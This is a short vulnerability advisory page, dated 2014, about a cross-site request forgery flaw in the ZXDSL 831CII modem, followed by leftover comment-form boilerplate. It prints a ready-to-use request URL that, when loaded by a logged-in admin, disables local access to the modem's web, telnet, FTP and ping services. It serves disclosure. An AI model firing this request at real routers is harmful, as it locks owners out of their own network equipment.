ZXDSL 831CII Cross Site Request Forgery

2014.11.11

Credit: Paulos Yibelo

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

ZXDSL 831CII Disable Access from Local network CSRF
Disable from:

Telnet
Web Browser
SNMP
Ping
FTP
TFTP

The following link will make a logged in admin disable all access from
lan. (which makes the modem unaccessable)

192.168.1.1/accesslocal.cmd?&enblicmp=0&enblftp=0&ftpport=21&enblhttp=0&httpport=80&enblsnmp=1&snmpport=161&enbltelnet=0&telnetport=23&enbltftp=1&tftpport=69&enblssh=1&sshport=22

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ZXDSL 831CII Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.